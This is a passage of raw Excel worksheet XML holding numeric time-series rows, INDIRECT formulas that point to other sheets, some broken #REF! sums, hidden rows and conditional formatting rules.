        <v>#REF!</v>
      </c>
      <c r="P39" s="40">
        <f ca="1">INDIRECT($N$3&amp;"!S30")</f>
        <v>0</v>
      </c>
      <c r="Q39" s="40">
        <f ca="1">INDIRECT($N$3&amp;"!T30")</f>
        <v>0</v>
      </c>
      <c r="R39" s="42">
        <f ca="1" t="shared" si="2"/>
        <v>0</v>
      </c>
    </row>
    <row r="40" ht="3" hidden="1" customHeight="1" spans="3:18">
      <c r="C40" s="46" t="s">
        <v>406</v>
      </c>
      <c r="D40" s="22" t="s">
        <v>352</v>
      </c>
      <c r="E40" s="47"/>
      <c r="F40" s="47"/>
      <c r="G40" s="47"/>
      <c r="H40" s="47">
        <v>0</v>
      </c>
      <c r="I40" s="47"/>
      <c r="J40" s="47"/>
      <c r="K40" s="47"/>
      <c r="L40" s="47"/>
      <c r="M40" s="47"/>
      <c r="N40" s="47"/>
      <c r="O40" s="25" t="e">
        <f>SUM(#REF!)/7</f>
        <v>#REF!</v>
      </c>
      <c r="P40" s="47"/>
      <c r="Q40" s="47"/>
      <c r="R40" s="42">
        <f t="shared" ref="R40:R45" si="3">N40-M40</f>
        <v>0</v>
      </c>
    </row>
    <row r="41" hidden="1" customHeight="1" spans="3:18">
      <c r="C41" s="46"/>
      <c r="D41" s="22" t="s">
        <v>312</v>
      </c>
      <c r="E41" s="47"/>
      <c r="F41" s="47"/>
      <c r="G41" s="47"/>
      <c r="H41" s="47">
        <v>0</v>
      </c>
      <c r="I41" s="47"/>
      <c r="J41" s="47"/>
      <c r="K41" s="47"/>
      <c r="L41" s="47"/>
      <c r="M41" s="47"/>
      <c r="N41" s="47"/>
      <c r="O41" s="25" t="e">
        <f>SUM(#REF!)/7</f>
        <v>#REF!</v>
      </c>
      <c r="P41" s="47"/>
      <c r="Q41" s="47"/>
      <c r="R41" s="42">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="42" hidden="1" customHeight="1" spans="3:18">
      <c r="C42" s="46"/>
      <c r="D42" s="22" t="s">
        <v>393</v>
      </c>
      <c r="E42" s="47"/>
      <c r="F42" s="47"/>
      <c r="G42" s="47"/>
      <c r="H42" s="47">
        <v>0</v>
      </c>
      <c r="I42" s="47"/>
      <c r="J42" s="47"/>
      <c r="K42" s="47"/>
      <c r="L42" s="47"/>
      <c r="M42" s="47"/>
      <c r="N42" s="47"/>
      <c r="O42" s="25" t="e">
        <f>SUM(#REF!)/7</f>
        <v>#REF!</v>
      </c>
      <c r="P42" s="47"/>
      <c r="Q42" s="47"/>
      <c r="R42" s="42">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="43" hidden="1" customHeight="1" spans="3:18">
      <c r="C43" s="46"/>
      <c r="D43" s="22" t="s">
        <v>396</v>
      </c>
      <c r="E43" s="47"/>
      <c r="F43" s="47"/>
      <c r="G43" s="47"/>
      <c r="H43" s="47">
        <v>0</v>
      </c>
      <c r="I43" s="47"/>
      <c r="J43" s="47"/>
      <c r="K43" s="47"/>
      <c r="L43" s="47"/>
      <c r="M43" s="47"/>
      <c r="N43" s="47"/>
      <c r="O43" s="25" t="e">
        <f>SUM(#REF!)/7</f>
        <v>#REF!</v>
      </c>
      <c r="P43" s="47"/>
      <c r="Q43" s="47"/>
      <c r="R43" s="42">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="44" hidden="1" customHeight="1" spans="3:18">
      <c r="C44" s="46"/>
      <c r="D44" s="22" t="s">
        <v>397</v>
      </c>
      <c r="E44" s="47"/>
      <c r="F44" s="47"/>
      <c r="G44" s="47"/>
      <c r="H44" s="47">
        <v>0</v>
      </c>
      <c r="I44" s="47"/>
      <c r="J44" s="47"/>
      <c r="K44" s="47"/>
      <c r="L44" s="47"/>
      <c r="M44" s="47"/>
      <c r="N44" s="47"/>
      <c r="O44" s="25" t="e">
        <f>SUM(#REF!)/7</f>
        <v>#REF!</v>
      </c>
      <c r="P44" s="47"/>
      <c r="Q44" s="47"/>
      <c r="R44" s="42">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="45" hidden="1" customHeight="1" spans="3:18">
      <c r="C45" s="46"/>
      <c r="D45" s="22" t="s">
        <v>348</v>
      </c>
      <c r="E45" s="47"/>
      <c r="F45" s="47"/>
      <c r="G45" s="47"/>
      <c r="H45" s="47">
        <v>0</v>
      </c>
      <c r="I45" s="47"/>
      <c r="J45" s="47"/>
      <c r="K45" s="47"/>
      <c r="L45" s="47"/>
      <c r="M45" s="47"/>
      <c r="N45" s="47"/>
      <c r="O45" s="25" t="e">
        <f>SUM(#REF!)/7</f>
        <v>#REF!</v>
      </c>
      <c r="P45" s="47"/>
      <c r="Q45" s="47"/>
      <c r="R45" s="42">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="46" customHeight="1" spans="3:18">
      <c r="C46" s="48" t="s">
        <v>407</v>
      </c>
      <c r="D46" s="49" t="s">
        <v>408</v>
      </c>
      <c r="E46" s="50">
        <v>172.96</v>
      </c>
      <c r="F46" s="50">
        <v>153.31</v>
      </c>
      <c r="G46" s="50">
        <v>160.33</v>
      </c>
      <c r="H46" s="50">
        <v>159.038333333333</v>
      </c>
      <c r="I46" s="50">
        <v>171.39</v>
      </c>
      <c r="J46" s="50">
        <v>162.74</v>
      </c>
      <c r="K46" s="50">
        <v>185.07</v>
      </c>
      <c r="L46" s="50">
        <v>202.59</v>
      </c>
      <c r="M46" s="50">
        <v>203.404220851732</v>
      </c>
      <c r="N46" s="50">
        <f ca="1">INDIRECT($N$3&amp;"!R14")</f>
        <v>222.5</v>
      </c>
      <c r="O46" s="51" t="e">
        <f>SUM(#REF!)/7</f>
        <v>#REF!</v>
      </c>
      <c r="P46" s="50">
        <f ca="1">INDIRECT($N$3&amp;"!S14")</f>
        <v>222.260126709285</v>
      </c>
      <c r="Q46" s="50">
        <f ca="1">INDIRECT($N$3&amp;"!T14")</f>
        <v>214.198871856523</v>
      </c>
      <c r="R46" s="42">
        <f ca="1">Q46-M46</f>
        <v>10.794651004791</v>
      </c>
    </row>
    <row r="47" customHeight="1" spans="3:18">
      <c r="C47" s="52"/>
      <c r="D47" s="49" t="s">
        <v>409</v>
      </c>
      <c r="E47" s="50">
        <v>57.76</v>
      </c>
      <c r="F47" s="50">
        <v>55.93</v>
      </c>
      <c r="G47" s="50">
        <v>58.56</v>
      </c>
      <c r="H47" s="50">
        <v>55.61</v>
      </c>
      <c r="I47" s="50">
        <v>53.04</v>
      </c>
      <c r="J47" s="50">
        <v>50.39</v>
      </c>
      <c r="K47" s="50">
        <v>56.15</v>
      </c>
      <c r="L47" s="50">
        <v>67.55</v>
      </c>
      <c r="M47" s="50">
        <v>63.5765784670449</v>
      </c>
      <c r="N47" s="50">
        <f ca="1">INDIRECT($N$3&amp;"!R15")</f>
        <v>64.8888888888889</v>
      </c>
      <c r="O47" s="51" t="e">
        <f>SUM(#REF!)/7</f>
        <v>#REF!</v>
      </c>
      <c r="P47" s="50">
        <f ca="1">INDIRECT($N$3&amp;"!S15")</f>
        <v>62.9180855286523</v>
      </c>
      <c r="Q47" s="50">
        <f ca="1">INDIRECT($N$3&amp;"!T15")</f>
        <v>61.4562464126039</v>
      </c>
      <c r="R47" s="42">
        <f ca="1" t="shared" ref="R47:R59" si="4">Q47-M47</f>
        <v>-2.12033205444099</v>
      </c>
    </row>
    <row r="48" customHeight="1" spans="3:18">
      <c r="C48" s="52"/>
      <c r="D48" s="49" t="s">
        <v>410</v>
      </c>
      <c r="E48" s="50">
        <v>57.7</v>
      </c>
      <c r="F48" s="50">
        <v>54.05</v>
      </c>
      <c r="G48" s="50">
        <v>56.3</v>
      </c>
      <c r="H48" s="50">
        <v>55.9208333333333</v>
      </c>
      <c r="I48" s="50">
        <v>52.92</v>
      </c>
      <c r="J48" s="50">
        <v>52.91</v>
      </c>
      <c r="K48" s="50">
        <v>55.82</v>
      </c>
      <c r="L48" s="50">
        <v>66.13</v>
      </c>
      <c r="M48" s="50">
        <v>64.7094142812621</v>
      </c>
      <c r="N48" s="50">
        <f ca="1">INDIRECT($N$3&amp;"!R16")</f>
        <v>63</v>
      </c>
      <c r="O48" s="51" t="e">
        <f>SUM(#REF!)/7</f>
        <v>#REF!</v>
      </c>
      <c r="P48" s="50">
        <f ca="1">INDIRECT($N$3&amp;"!S16")</f>
        <v>61.0198487128223</v>
      </c>
      <c r="Q48" s="50">
        <f ca="1">INDIRECT($N$3&amp;"!T16")</f>
        <v>62.720234204444</v>
      </c>
      <c r="R48" s="42">
        <f ca="1" t="shared" si="4"/>
        <v>-1.9891800768181</v>
      </c>
    </row>
    <row r="49" customHeight="1" spans="3:22">
      <c r="C49" s="52"/>
      <c r="D49" s="49" t="s">
        <v>400</v>
      </c>
      <c r="E49" s="50">
        <v>151.447195708569</v>
      </c>
      <c r="F49" s="50">
        <v>152.532005011036</v>
      </c>
      <c r="G49" s="50">
        <v>145.07</v>
      </c>
      <c r="H49" s="50">
        <v>137.134969159588</v>
      </c>
      <c r="I49" s="50">
        <v>141.557647371666</v>
      </c>
      <c r="J49" s="50">
        <v>132.981089508083</v>
      </c>
      <c r="K49" s="50">
        <v>126.198658028858</v>
      </c>
      <c r="L49" s="50">
        <v>125.690112102474</v>
      </c>
      <c r="M49" s="50">
        <v>152.12232624179</v>
      </c>
      <c r="N49" s="50">
        <f ca="1">INDIRECT($N$3&amp;"!R7")</f>
        <v>119.648397104447</v>
      </c>
      <c r="O49" s="51" t="e">
        <f>SUM(#REF!)/7</f>
        <v>#REF!</v>
      </c>
      <c r="P49" s="50">
        <f ca="1">INDIRECT($N$3&amp;"!S7")</f>
        <v>125.600949313443</v>
      </c>
      <c r="Q49" s="50">
        <f ca="1">INDIRECT($N$3&amp;"!T7")</f>
        <v>131.25975586071</v>
      </c>
      <c r="R49" s="42">
        <f ca="1" t="shared" si="4"/>
        <v>-20.86257038108</v>
      </c>
    </row>
    <row r="50" customHeight="1" spans="3:22">
      <c r="C50" s="52"/>
      <c r="D50" s="49" t="s">
        <v>401</v>
      </c>
      <c r="E50" s="50">
        <v>159.867207066259</v>
      </c>
      <c r="F50" s="50">
        <v>147.856183215796</v>
      </c>
      <c r="G50" s="50">
        <v>148.74</v>
      </c>
      <c r="H50" s="50">
        <v>136.554363345872</v>
      </c>
      <c r="I50" s="50">
        <v>143.494605434271</v>
      </c>
      <c r="J50" s="50">
        <v>121.112638105549</v>
      </c>
      <c r="K50" s="50">
        <v>122.675317203506</v>
      </c>
      <c r="L50" s="50">
        <v>117.214810072361</v>
      </c>
      <c r="M50" s="50">
        <v>146.155417551888</v>
      </c>
      <c r="N50" s="50">
        <f ca="1">INDIRECT($N$3&amp;"!R8")</f>
        <v>113.547052740434</v>
      </c>
      <c r="O50" s="51" t="e">
        <f>SUM(#REF!)/7</f>
        <v>#REF!</v>
      </c>
      <c r="P50" s="50">
        <f ca="1">INDIRECT($N$3&amp;"!S8")</f>
        <v>130.57091882248</v>
      </c>
      <c r="Q50" s="50">
        <f ca="1">INDIRECT($N$3&amp;"!T8")</f>
        <v>127.842014882656</v>
      </c>
      <c r="R50" s="42">
        <f ca="1" t="shared" si="4"/>
        <v>-18.313402669232</v>
      </c>
    </row>
    <row r="51" customHeight="1" spans="3:22">
      <c r="C51" s="52"/>
      <c r="D51" s="49" t="s">
        <v>411</v>
      </c>
      <c r="E51" s="50"/>
      <c r="F51" s="50"/>
      <c r="G51" s="50"/>
      <c r="H51" s="50"/>
      <c r="I51" s="50"/>
      <c r="J51" s="50">
        <v>206.135838092114</v>
      </c>
      <c r="K51" s="50">
        <v>243.311367132294</v>
      </c>
      <c r="L51" s="50">
        <v>274.621536875049</v>
      </c>
      <c r="M51" s="50">
        <v>298.232307185729</v>
      </c>
      <c r="N51" s="50">
        <f ca="1">INDIRECT($N$3&amp;"!R9")</f>
        <v>234.625</v>
      </c>
      <c r="O51" s="51" t="e">
        <f>SUM(#REF!)/7</f>
        <v>#REF!</v>
      </c>
      <c r="P51" s="50">
        <f ca="1">INDIRECT($N$3&amp;"!S9")</f>
        <v>262.129479427813</v>
      </c>
      <c r="Q51" s="50">
        <f ca="1">INDIRECT($N$3&amp;"!T9")</f>
        <v>270.500810282931</v>
      </c>
      <c r="R51" s="42">
        <f ca="1" t="shared" si="4"/>
        <v>-27.731496902798</v>
      </c>
    </row>
    <row r="52" customHeight="1" spans="3:22">
      <c r="C52" s="52"/>
      <c r="D52" s="49" t="s">
        <v>412</v>
      </c>
      <c r="E52" s="50"/>
      <c r="F52" s="50"/>
      <c r="G52" s="50"/>
      <c r="H52" s="50"/>
      <c r="I52" s="50"/>
      <c r="J52" s="50">
        <v>209.342399654441</v>
      </c>
      <c r="K52" s="50">
        <v>252.924999531921</v>
      </c>
      <c r="L52" s="50">
        <v>286.594740702664</v>
      </c>
      <c r="M52" s="50">
        <v>298.77979605868</v>
      </c>
      <c r="N52" s="50">
        <f ca="1">INDIRECT($N$3&amp;"!R10")</f>
        <v>0</v>
      </c>
      <c r="O52" s="51"/>
      <c r="P52" s="50">
        <f ca="1">INDIRECT($N$3&amp;"!S10")</f>
        <v>243.93649579189</v>
      </c>
      <c r="Q52" s="50">
        <f ca="1">INDIRECT($N$3&amp;"!T10")</f>
        <v>266.698287202608</v>
      </c>
      <c r="R52" s="42">
        <f ca="1" t="shared" si="4"/>
        <v>-32.081508856072</v>
      </c>
    </row>
    <row r="53" customHeight="1" spans="3:22">
      <c r="C53" s="52"/>
      <c r="D53" s="53" t="s">
        <v>413</v>
      </c>
      <c r="E53" s="50"/>
      <c r="F53" s="50"/>
      <c r="G53" s="50"/>
      <c r="H53" s="50"/>
      <c r="I53" s="50"/>
      <c r="J53" s="50"/>
      <c r="K53" s="50"/>
      <c r="L53" s="50"/>
      <c r="M53" s="50">
        <v>199.030056280685</v>
      </c>
      <c r="N53" s="50">
        <f ca="1">INDIRECT($N$3&amp;"!R12")</f>
        <v>0</v>
      </c>
      <c r="O53" s="51"/>
      <c r="P53" s="50">
        <f ca="1">INDIRECT($N$3&amp;"!S12")</f>
        <v>0</v>
      </c>
      <c r="Q53" s="50">
        <f ca="1">INDIRECT($N$3&amp;"!T12")</f>
        <v>0</v>
      </c>
      <c r="R53" s="42"/>
    </row>
    <row r="54" customHeight="1" spans="3:22">
      <c r="C54" s="52"/>
      <c r="D54" s="49" t="s">
        <v>348</v>
      </c>
      <c r="E54" s="50">
        <v>206.337565586901</v>
      </c>
      <c r="F54" s="50">
        <v>211.259669120704</v>
      </c>
      <c r="G54" s="50">
        <v>208.39</v>
      </c>
      <c r="H54" s="50">
        <v>205.339468512545</v>
      </c>
      <c r="I54" s="50">
        <v>193.352236386862</v>
      </c>
      <c r="J54" s="50">
        <v>181.158465130623</v>
      </c>
      <c r="K54" s="50">
        <v>192.492102901767</v>
      </c>
      <c r="L54" s="50">
        <v>211.476299506013</v>
      </c>
      <c r="M54" s="50">
        <v>209.019452290151</v>
      </c>
      <c r="N54" s="50">
        <f ca="1">INDIRECT($N$3&amp;"!R18")</f>
        <v>220</v>
      </c>
      <c r="O54" s="51" t="e">
        <f>SUM(#REF!)/7</f>
        <v>#REF!</v>
      </c>
      <c r="P54" s="50">
        <f ca="1">INDIRECT($N$3&amp;"!S18")</f>
        <v>217.982142857143</v>
      </c>
      <c r="Q54" s="50">
        <f ca="1">INDIRECT($N$3&amp;"!T18")</f>
        <v>221.669906370098</v>
      </c>
      <c r="R54" s="42">
        <f ca="1" t="shared" si="4"/>
        <v>12.650454079947</v>
      </c>
    </row>
    <row r="55" customHeight="1" spans="3:22">
      <c r="C55" s="52"/>
      <c r="D55" s="49" t="s">
        <v>402</v>
      </c>
      <c r="E55" s="50">
        <v>108.625398660342</v>
      </c>
      <c r="F55" s="50">
        <v>105.361993260492</v>
      </c>
      <c r="G55" s="50">
        <v>106.17</v>
      </c>
      <c r="H55" s="50">
        <v>106.924976175095</v>
      </c>
      <c r="I55" s="50">
        <v>102.327627238261</v>
      </c>
      <c r="J55" s="50">
        <v>100.487560329252</v>
      </c>
      <c r="K55" s="50">
        <v>100.295371072886</v>
      </c>
      <c r="L55" s="50">
        <v>108.522742398893</v>
      </c>
      <c r="M55" s="50">
        <v>110.967845119879</v>
      </c>
      <c r="N55" s="50">
        <f ca="1">INDIRECT($N$3&amp;"!R22")</f>
        <v>108.820512820513</v>
      </c>
      <c r="O55" s="51" t="e">
        <f>SUM(#REF!)/7</f>
        <v>#REF!</v>
      </c>
      <c r="P55" s="50">
        <f ca="1">INDIRECT($N$3&amp;"!S22")</f>
        <v>102.653156946799</v>
      </c>
      <c r="Q55" s="50">
        <f ca="1">INDIRECT($N$3&amp;"!T22")</f>
        <v>102.296684017156</v>
      </c>
      <c r="R55" s="42">
        <f ca="1" t="shared" si="4"/>
        <v>-8.671161102723</v>
      </c>
    </row>
    <row r="56" customHeight="1" spans="3:22">
      <c r="C56" s="52"/>
      <c r="D56" s="49" t="s">
        <v>403</v>
      </c>
      <c r="E56" s="50">
        <v>68.9</v>
      </c>
      <c r="F56" s="50">
        <v>71.7358135067238</v>
      </c>
      <c r="G56" s="50">
        <v>77.02</v>
      </c>
      <c r="H56" s="50">
        <v>81.8980454685532</v>
      </c>
      <c r="I56" s="50">
        <v>75.5681578868197</v>
      </c>
      <c r="J56" s="50">
        <v>79.5178990457717</v>
      </c>
      <c r="K56" s="50">
        <v>77.8918404771576</v>
      </c>
      <c r="L56" s="50">
        <v>73.516413047246</v>
      </c>
      <c r="M56" s="50">
        <v>80.343193341699</v>
      </c>
      <c r="N56" s="50">
        <f ca="1">INDIRECT($N$3&amp;"!R23")</f>
        <v>77.1568714432376</v>
      </c>
      <c r="O56" s="51" t="e">
        <f>SUM(#REF!)/7</f>
        <v>#REF!</v>
      </c>
      <c r="P56" s="50">
        <f ca="1">INDIRECT($N$3&amp;"!S23")</f>
        <v>83.4948223620684</v>
      </c>
      <c r="Q56" s="50">
        <f ca="1">INDIRECT($N$3&amp;"!T23")</f>
        <v>79.579074545719</v>
      </c>
      <c r="R56" s="42">
        <f ca="1" t="shared" si="4"/>
        <v>-0.764118795980011</v>
      </c>
      <c r="V56" s="13" t="s">
        <v>414</v>
      </c>
    </row>
    <row r="57" customHeight="1" spans="3:22">
      <c r="C57" s="52"/>
      <c r="D57" s="49" t="s">
        <v>415</v>
      </c>
      <c r="E57" s="50"/>
      <c r="F57" s="50"/>
      <c r="G57" s="50"/>
      <c r="H57" s="50"/>
      <c r="I57" s="50">
        <v>176.528570092584</v>
      </c>
      <c r="J57" s="50">
        <v>220.314864650942</v>
      </c>
      <c r="K57" s="50">
        <v>248.707854775544</v>
      </c>
      <c r="L57" s="50">
        <v>261.089767106908</v>
      </c>
      <c r="M57" s="50">
        <v>275.849113509273</v>
      </c>
      <c r="N57" s="50">
        <f ca="1">INDIRECT($N$3&amp;"!R21")</f>
        <v>282.829268292683</v>
      </c>
      <c r="O57" s="51" t="e">
        <f>SUM(#REF!)/7</f>
        <v>#REF!</v>
      </c>
      <c r="P57" s="50">
        <f ca="1">INDIRECT($N$3&amp;"!S21")</f>
        <v>277.499306567365</v>
      </c>
      <c r="Q57" s="50">
        <f ca="1">INDIRECT($N$3&amp;"!T21")</f>
        <v>275.831243056423</v>
      </c>
      <c r="R57" s="42">
        <f ca="1" t="shared" si="4"/>
        <v>-0.0178704528500475</v>
      </c>
    </row>
    <row r="58" customHeight="1" spans="3:22">
      <c r="C58" s="52"/>
      <c r="D58" s="49" t="s">
        <v>416</v>
      </c>
      <c r="E58" s="50">
        <v>83.8741379235701</v>
      </c>
      <c r="F58" s="50">
        <v>86.9680682002783</v>
      </c>
      <c r="G58" s="50">
        <v>87.89</v>
      </c>
      <c r="H58" s="50">
        <v>81.1632476762391</v>
      </c>
      <c r="I58" s="50">
        <v>85.938177968308</v>
      </c>
      <c r="J58" s="50">
        <v>79.2737963961744</v>
      </c>
      <c r="K58" s="50">
        <v>83.6631160035415</v>
      </c>
      <c r="L58" s="50">
        <v>85.1012657911382</v>
      </c>
      <c r="M58" s="50">
        <v>81.58</v>
      </c>
      <c r="N58" s="50">
        <f ca="1">INDIRECT($N$3&amp;"!R24")</f>
        <v>90.5365853658537</v>
      </c>
      <c r="O58" s="51" t="e">
        <f>SUM(#REF!)/7</f>
        <v>#REF!</v>
      </c>
      <c r="P58" s="50">
        <f ca="1">INDIRECT($N$3&amp;"!S24")</f>
        <v>83.8943992523841</v>
      </c>
      <c r="Q58" s="50">
        <f ca="1">INDIRECT($N$3&amp;"!T24")</f>
        <v>85.9321507047537</v>
      </c>
      <c r="R58" s="42">
        <f ca="1" t="shared" si="4"/>
        <v>4.3521507047537</v>
      </c>
      <c r="V58" s="2" t="s">
        <v>362</v>
      </c>
    </row>
    <row r="59" customHeight="1" spans="3:22">
      <c r="C59" s="52"/>
      <c r="D59" s="49" t="s">
        <v>417</v>
      </c>
      <c r="E59" s="50">
        <v>187.764457863613</v>
      </c>
      <c r="F59" s="50">
        <v>189.359318030978</v>
      </c>
      <c r="G59" s="50">
        <v>191.9</v>
      </c>
      <c r="H59" s="50">
        <v>181.751831202006</v>
      </c>
      <c r="I59" s="50">
        <v>186.89455101639</v>
      </c>
      <c r="J59" s="50">
        <v>179.633360846889</v>
      </c>
      <c r="K59" s="50">
        <v>185.135148007906</v>
      </c>
      <c r="L59" s="50">
        <v>192.061887160593</v>
      </c>
      <c r="M59" s="50">
        <v>187.68</v>
      </c>
      <c r="N59" s="50">
        <f ca="1">INDIRECT($N$3&amp;"!R25")</f>
        <v>168.952380952381</v>
      </c>
      <c r="O59" s="51" t="e">
        <f>SUM(#REF!)/7</f>
        <v>#REF!</v>
      </c>
      <c r="P59" s="50">
        <f ca="1">INDIRECT($N$3&amp;"!S25")</f>
        <v>187.879339783722</v>
      </c>
      <c r="Q59" s="50">
        <f ca="1">INDIRECT($N$3&amp;"!T25")</f>
        <v>187.601723956314</v>
      </c>
      <c r="R59" s="42">
        <f ca="1" t="shared" si="4"/>
        <v>-0.078276043686003</v>
      </c>
    </row>
    <row r="60" customHeight="1" spans="3:22">
      <c r="C60" s="52"/>
      <c r="D60" s="49" t="s">
        <v>321</v>
      </c>
      <c r="E60" s="50">
        <v>190.99</v>
      </c>
      <c r="F60" s="50">
        <v>199.860632929302</v>
      </c>
      <c r="G60" s="50"/>
      <c r="H60" s="50"/>
      <c r="I60" s="50"/>
      <c r="J60" s="50"/>
      <c r="K60" s="50"/>
      <c r="L60" s="50">
        <v>179.100346020761</v>
      </c>
      <c r="M60" s="50">
        <v>173.460076045627</v>
      </c>
      <c r="N60" s="50">
        <f ca="1">INDIRECT($N$3&amp;"!R26")</f>
        <v>0</v>
      </c>
      <c r="O60" s="51" t="e">
        <f>SUM(#REF!)/7</f>
        <v>#REF!</v>
      </c>
      <c r="P60" s="50">
        <f ca="1">INDIRECT($N$3&amp;"!S26")</f>
        <v>0</v>
      </c>
      <c r="Q60" s="50">
        <f ca="1">INDIRECT($N$3&amp;"!T26")</f>
        <v>0</v>
      </c>
      <c r="R60" s="42"/>
    </row>
  </sheetData>
  <mergeCells count="9">
    <mergeCell ref="C2:Q2"/>
    <mergeCell ref="C5:C9"/>
    <mergeCell ref="C10:C15"/>
    <mergeCell ref="C16:C21"/>
    <mergeCell ref="C22:C27"/>
    <mergeCell ref="C28:C33"/>
    <mergeCell ref="C34:C39"/>
    <mergeCell ref="C40:C45"/>
    <mergeCell ref="C46:C60"/>
  </mergeCells>
  <conditionalFormatting sqref="R4">
    <cfRule type="cellIs" dxfId="3" priority="18" stopIfTrue="1" operator="equal">
      <formula>0</formula>
    </cfRule>
    <cfRule type="expression" dxfId="4" priority="19" stopIfTrue="1">
      <formula>ISERROR(R4)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="R28:R60">
    <cfRule type="cellIs" dxfId="5" priority="9" operator="lessThan">
      <formula>0</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="R28:R33">
    <cfRule type="cellIs" dxfId="6" priority="1" operator="greaterThan">
      <formula>0</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="7" priority="2" operator="lessThan">
      <formula>0</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="N1:Q1 N3:Q65538 F22:M59 E22:E60">
    <cfRule type="cellIs" dxfId="3" priority="24" stopIfTrue="1" operator="equal">
      <formula>0</formula>
    </cfRule>
    <cfRule type="expression" dxfId="4" priority="25" stopIfTrue="1">
      <formula>ISERROR(E1)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="R22:R27 R34:R39 R46:R60">
    <cfRule type="cellIs" dxfId="6" priority="3" operator="lessThan">
      <formula>0</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="7" priority="4" operator="greaterThan">
      <formula>0</formula>
    </cfRule>
  </conditionalFormatting>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" orientation="portrait"/>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tabColor rgb="FFFFFF00"/>
  </sheetPr>
  <dimension ref="A1"/>
  <sheetViews>
    <sheetView showGridLines="0" showRowColHeaders="0" showOutlineSymbols="0" zoomScale="85" zoomScaleNormal="85" workbookViewId="0">
      <selection activeCell="Y50" sqref="Y50"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="14.25"/>
  <sheetData/>
  <pageMargins left="0.75" right="0.75" top="1" bottom="1" header="0.51" footer="0.51"/>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1">
    <tabColor rgb="FFFFFF00"/>
  </sheetPr>
  <dimension ref="A1"/>
  <sheetViews>
    <sheetView showGridLines="0" showRowColHeaders="0" showOutlineSymbols="0" zoomScale="85" zoomScaleNormal="85" workbookViewId="0">
      <selection activeCell="J41" sqref="J41"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="14.25"/>
  <sheetData/>
  <pageMargins left="0.75" right="0.75" top="1" bottom="1" header="0.51" footer="0.51"/>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2">
    <tabColor rgb="FF00B0F0"/>
  </sheetPr>
  <dimension ref="A1:AL23"/>
  <sheetViews>
    <sheetView zoomScale="80" zoomScaleNormal="80" workbookViewId="0">
      <pane xSplit="4" ySplit="2" topLeftCell="E3" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="AM22" sqref="AM22"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="4.75" style="2" customWidth="1"/>
    <col min="2" max="4" width="5.25" style="2" customWidth="1"/>
    <col min="5" max="37" width="5.375" style="2" customWidth="1"/>
    <col min="38" max="16384" width="9" style="2"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:38">
      <c r="A1" s="3">
        <f>IFERROR('[9]26'!N2,'1'!N2)</f>
        <v>45992</v>
      </c>
      <c r="B1" s="3"/>
      <c r="C1" s="4"/>
      <c r="D1" s="5"/>
      <c r="E1" s="6" t="s">
        <v>418</v>
      </c>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7"/>
    </row>
    <row r="2" s="1" customFormat="1" spans="1:38">
      <c r="A2" s="3"/>
      <c r="B2" s="3"/>
      <c r="C2" s="4"/>
      <c r="D2" s="5"/>
      <c r="E2" s="8">
        <v>1</v>
      </c>
      <c r="F2" s="8">
        <v>2</v>
      </c>
      <c r="G2" s="8">
        <v>3</v>
      </c>
      <c r="H2" s="8">
        <v>4</v>
      </c>
      <c r="I2" s="8">
        <v>5</v>
      </c>
      <c r="J2" s="8">
        <v>6</v>
      </c>
      <c r="K2" s="8">
        <v>7</v>
      </c>
      <c r="L2" s="8">
        <v>8</v>
      </c>
      <c r="M2" s="8">
        <v>9</v>
      </c>
      <c r="N2" s="8">
        <v>10</v>
      </c>
      <c r="O2" s="8">
        <v>11</v>
      </c>
      <c r="P2" s="8">
        <v>12</v>
      </c>
      <c r="Q2" s="8">
        <v>13</v>
      </c>
      <c r="R2" s="8">
        <v>14</v>
      </c>
      <c r="S2" s="8">
        <v>15</v>
      </c>
      <c r="T2" s="8">
        <v>16</v>
      </c>
      <c r="U2" s="8">
        <v>17</v>
      </c>
      <c r="V2" s="8">
        <v>18</v>
      </c>
      <c r="W2" s="8">
        <v>19</v>
      </c>
      <c r="X2" s="8">
        <v>20</v>
      </c>
      <c r="Y2" s="8">
        <v>21</v>
      </c>
      <c r="Z2" s="8">
        <v>22</v>
      </c>
      <c r="AA2" s="8">
        <v>23</v>
      </c>
      <c r="AB2" s="8">
        <v>24</v>
      </c>
      <c r="AC2" s="8">
        <v>25</v>
      </c>
      <c r="AD2" s="8">
        <v>26</v>
      </c>
      <c r="AE2" s="8">
        <v>27</v>
      </c>
      <c r="AF2" s="8">
        <v>28</v>
      </c>
      <c r="AG2" s="8">
        <v>29</v>
      </c>
      <c r="AH2" s="8">
        <v>30</v>
      </c>
      <c r="AI2" s="8">
        <v>31</v>
      </c>
      <c r="AJ2" s="8" t="s">
        <v>419</v>
      </c>
      <c r="AK2" s="8" t="s">
        <v>363</v>
      </c>
      <c r="AL2" s="7"/>
    </row>
    <row r="4" ht="16.5" customHeight="1" spans="1:38">
      <c r="A4" s="9" t="s">
        <v>420</v>
      </c>
      <c r="B4" s="10" t="s">
        <v>421</v>
      </c>
      <c r="C4" s="11" t="s">
        <v>312</v>
      </c>
      <c r="D4" s="11"/>
      <c r="E4" s="12">
        <f ca="1" t="shared" ref="E4:AK4" si="0">IF(ISERROR(INDIRECT("'"&amp;E$2&amp;"'!"&amp;$B4)),NA(),INDIRECT("'"&amp;E$2&amp;"'!"&amp;$B4))/10000</f>
        <v>19.0518102</v>
      </c>
      <c r="F4" s="12">
